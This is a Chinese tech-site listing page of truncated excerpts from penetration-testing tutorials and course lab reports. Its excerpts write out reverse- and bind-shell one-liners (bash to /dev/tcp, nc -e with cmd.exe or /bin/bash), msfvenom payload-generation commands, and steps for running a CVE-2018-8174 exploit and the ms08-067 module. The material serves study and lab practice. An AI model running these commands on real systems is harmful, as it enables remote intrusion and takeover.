ICode9

精准搜索请尝试: 精确搜索
  • 用bash反弹shell2022-09-08 12:00:16

    用bash反弹shell 受害主机;linux系统 攻击机:需要安装netcat(nc) 受害主机执行:ifconfig  ## 查看受害主机ip 攻击机执行:nc -lvp 19999 ## 在攻击机监听19999端口   受害主机执行:bash -i &> /dev/tcp/[攻击机ip]/[攻击机监听端口] 0>&1  ##反弹shell,bash是linux shell的一种,-i是指

  • 20212810 2021-2022-2 《网络攻防实践》实践十一报告2022-05-28 21:33:34

    20212810 2021-2022-2 《网络攻防实践》实践十一报告 一.实践内容 1.Web浏览器渗透攻击实验 任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。 2.取证分析实践—网页木马攻击场景分析 3.攻防对抗实践—web浏览器渗透攻击攻防 攻击

  • 隧道技术-nc2022-05-22 20:34:56

    shell反弹 正向反弹:攻击机直接连接靶机 条件:攻击机与靶机需互相访问 eg:攻击机:192.168.3.27 靶机:192.168.3.29 1111是端口号 靶机执行: windows机器:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe Linux机器:  nc -lvvp 1111 -e /bin/bash 攻击机执行: nc 192.168.3.29 1111   反响

  • 0day漏洞2022-05-14 00:35:26

          git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git     从github上下载文件 cd CVE-2018-8174_EXP.git     进入文件夹        python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444 (-u 是攻击

  • ms08_0672022-05-03 13:35:46

    ms08-067 漏洞描述: Microsoft Windows Server服务RPC请求缓冲区溢出漏洞 复现流程: 在网络畅通的情况下进行 靶机:nat,10.10.10.146 攻击机:nat,10.10.10.150 输入命令msfconsole 查看主机是否存活:ping 10.10.10.150,存活 查找是否有ms08067漏洞模块 配置响应参数:使用,靶机地址,攻

  • 靶机记录(十二):evilscience2021-10-30 21:03:13

    目录 主机发现 端口扫描 SSH尝试连接 Web渗透 漏洞挖掘 GetShell   法一  法二(MSF)  提权  法一(失败了)  法二(脏牛,也失败了。。)​​​  法三  法四  法五  flag 清痕迹,留后门 主机发现 端口扫描    SSH尝试连接   Web渗透 漏洞挖掘 试试其他的路径 : /var/log

  • 反弹shell学习2021-07-24 16:34:32

    文章目录 简单讲一下反弹shell:什么是shell?反弹shell的原理到底是什么: 重定向符号了解:输入重定向: <输出重定向:>标准输出与标准错误输出重定向:&> 、>&exec 绑定重定向: 反弹shell的:适用环境:具体理解命令行: 结语: 简单讲一下反弹shell: 什么是shell? linux的终端就是shell

  • 20182217刘洪宇_Exp7 网络欺诈防范2021-05-23 16:35:02

    1. 实践内容 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。 具体实践有 (1)简单应用SET工具建立冒名网站 (1分)  修改Apache的端口文件,输入 sudo vi /etc/apache2/ports.conf 编辑Apache的端口配置文件,确定http对应端口号为80即可     查看8

  • 内网渗透--隐藏通信隧道技术(上)2021-05-20 16:02:13

    为什么要建立隧道 隧道–绕过端口屏蔽的方式。当我们拿到一台web服务器的权限时,内网服务器对于安全的考虑,可能会对进出的流量端口进行一些屏蔽,这样,我们就无法和内网的服务器进行连接。所以需要通过web服务器作为跳板,建立隧道,达到与内网服务器连通的效果。(个人理解) 判断内网的

  • 内网渗透之反弹shell2021-01-31 22:02:24

    蚕吐丝,蜂酿蜜,人不学,不如物! 场景1 步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入) nc -lvp 4444 -e cmd.exe (反弹windows shell) nc -lvp 4444 -e /bin/bash (反弹linux shell) 步骤二:攻击机连接被控服务器的4444端口(攻击机输入) nc -nv 受害机ip 4444

  • 实验四——恶意代码技术2020-12-06 12:05:57

    中国人民公安大学 Chinese people’ public security university   网络对抗技术 实验报告   实验四 恶意代码技术       学生姓名 李婷婷  年级  2018 区队  网安四区 指导教师  高见     信息技术与网络安全学院 2016年11

  • msfvenom 常用生成 payload 命令2020-03-05 10:03:23

    windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -opayload.exe mac: msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP

  • [Shell]Telnet反弹shell2019-09-16 18:56:08

    原作者:包子love 文章出处:黑白之道 今天给大家介绍两种telnet反弹shell的方法,相对于其他方式反弹shell要简单一点,可作为按需远程控制或留后门使用,希望可以帮助到大家。 前提条件:目标机为linux系统并支持telnet服务;攻击机支持telnet服务,攻击机装有NC (windows、linux均可)。 这里我

  • 反弹shell利用方式2019-07-29 18:54:37

    反弹shell   1.bash反弹 攻击机监听端口  netcat: nc -nvlp 4444 -n:  不反向解析dns,即不通过ip解析域名 no dns -v:  详细信息输出 verbose -l:   监听 listen -p: 指定端口 port   靶机执行shell命令    bash -i >& /dev/tcp/攻击机ip/攻击机port 0>&1 bash -i:交互

  • 网络安全之Mac泛洪攻击与ARP攻击模拟2019-07-20 10:04:57

    文章目录1、环境搭建:MAC泛洪攻击实现1、主机C(攻击机)的IP查询和ARP表查询:![在这里插入图片描述](https://img-blog.csdnimg.cn/20190720094901486.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0NzY3Nzg0

  • 2018-2019-2 20165305《网络攻防技术》Exp5 MSF基础应用2019-04-17 22:40:59

    1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1主动攻击实践,ms17_010; 1.2 针对浏览器的攻击,ms13-008,MS10-046(唯一)。 1.3 针对客户端的攻击,adobe_toolbutton; 1.4 成功应用任何一个辅助模块,browser autopwn; 2.实验步骤及结

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有